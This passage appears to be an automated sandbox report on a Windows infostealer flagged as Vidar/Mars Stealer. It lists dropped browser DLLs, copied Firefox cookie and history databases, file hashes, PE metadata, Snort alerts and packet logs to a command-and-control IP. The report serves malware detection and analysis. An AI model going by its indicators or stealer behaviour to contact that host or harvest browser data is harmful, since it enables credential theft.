malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Reputation:	high, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\4E3O8YCT

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\HLXTR1D2

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\JE3OPZM7

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\UKXLFU3O

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\US0HLXBA

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.65258166782298
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
File size:	200'096 bytes
MD5:	076ac01ea35d4b4a78130ffe0b0da1b9
SHA1:	0e20fae40bccd1f9ac4845ec3ff4f29f5b7250b8
SHA256:	4a4edf2b54ebe39c26293d94699b07050709a8549c213f9ac8f344f766707fc9
SHA512:	582f6729a1019cc2662c0ec8518fae2609267cc3f5662f44e4f5720d5bd33e532dbcaaf2a7279135ecc72412354708853ec4dc49884ac2e24dee6c36c4a49fd9
SSDEEP:	6144:h9H1Xawk0LIRwox29ll1NsJF5cnZ1msCX:h9ZauIRwooLstcnZsf
TLSH:	2314F1C7131E8047DE8E98F6B8758C07382A9BB4E29F805767F1A1A10DF62C61B56736
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ze...............G.8...............`........@.................................8......................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46960b
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x655A8AFB [Sun Nov 19 22:23:55 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	17a4bd9c95f2898add97f309fc6f9bcd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=R3, O=Let's Encrypt, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	31/10/2023 13:51:27 29/01/2024 13:51:26
Subject Chain	CN=docdro.id
Version:	3
Thumbprint MD5:	4C8142A0C6855DC9C12FED93A6B7DE9E
Thumbprint SHA-1:	211498B6E43150FA3F77AFA65EA20EC90D89B781
Thumbprint SHA-256:	6DD3F44E4E6EDEF40940DB00D43E0678DE823DD2601E7FD377B35042CF9347AF
Serial:	0361B9CBFB006EB0A3D4E62091D11FB43C4B

Entrypoint Preview

Instruction
call 00007EFFE9144369h
jmp 00007EFFE9145403h
add byte ptr [eax], al
add byte ptr [ebp-17h], dl
outsd
sub al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, ch
aad 19h
add byte ptr [eax], al
test eax, eax
je 00007EFFE9142A45h
jmp 00007EFFE91453BAh
add byte ptr [eax], al
je 00007EFFE9142A38h
push dword ptr [ebp-2Ch]
call 00007EFFE914432Dh
test eax, eax
je 00007EFFE91429ECh
jmp 00007EFFE9145395h
add byte ptr [eax], al
je 00007EFFE91429E3h
jmp 00007EFFE914537Fh
add byte ptr [eax], al
add al, ch
sahf
sbb dword ptr [eax], eax
add byte ptr [ebp-169F8B40h], al
in al, dx
sub dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
call 00007EFFE9144302h
test eax, eax
je 00007EFFE91429C1h
jmp 00007EFFE9145331h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000001h], bh
mov byte ptr [ebp-0000012Ch], 00000044h
mov byte ptr [ebp-0000012Bh], 0000006Fh
mov byte ptr [ebp-0000012Ah], 0000006Eh
mov byte ptr [ebp-00000129h], 00000065h
mov byte ptr [ebp-00000128h], 00000000h
lea eax, dword ptr [ebp-0000012Ch]
mov eax, 00000001h
leave
ret
mov eax, 00000001h
jmp 00007EFFE91452A1h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a000	0x88	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2fa00	0x13a0	.bss
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.bss	0x1000	0x3d000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x3e000	0x27e10	0x28000	False	0.965167236328125	OpenPGP Secret Key	7.995393393564579	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x66000	0x3708	0x3800	False	0.08879743303571429	data	0.8427557314959375	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.idata	0x6a000	0x88	0x200	False	0.169921875	data	1.2886213933862716	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.itext	0x6b000	0x265	0x400	False	0.36328125	data	3.3543477245949744	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x6c000	0x36d5	0x3800	False	0.39815848214285715	OpenPGP Public Key	5.158333537184692	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
KERNEL32.DLL	GetProcAddress, LoadLibraryA, ExitProcess

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
179.43.170.230192.168.2.480497312036654 11/20/23-05:21:11.743610	TCP	2036654	ET TROJAN Win32/Vidar Variant/Mars Stealer Resources Download	80	49731	179.43.170.230	192.168.2.4
192.168.2.4179.43.170.23049731802022818 11/20/23-05:21:10.998145	TCP	2022818	ET TROJAN Generic gate .php GET with minimal headers	49731	80	192.168.2.4	179.43.170.230

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2023 05:21:10.789756060 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:10.997754097 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:10.997855902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:10.998145103 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.220483065 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.234833956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.235037088 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.553064108 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.743609905 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743663073 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743680000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743696928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743716955 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743735075 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743771076 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.743782997 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743802071 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743817091 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.743828058 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.743855953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.743865967 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743892908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.743911982 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.743947029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.938690901 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.938718081 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.938745022 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.938764095 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.938807964 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.938915968 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939136028 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939152956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939167976 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939184904 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939192057 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939203978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939223051 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939224958 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939239979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939258099 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939271927 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939271927 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939305067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939305067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939376116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939394951 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939430952 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939464092 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939766884 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939785004 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.939822912 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.939850092 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.940176010 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.940232992 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.940239906 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.940290928 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.940606117 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.940639973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:11.940660000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:11.940690994 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.136034966 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136064053 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136080980 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136099100 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136147022 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.136203051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.136367083 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136384964 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136420965 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.136435032 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136436939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:12.136454105 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:12.136485100 CET	49731	80	192.168.2.4	179.43.170.230
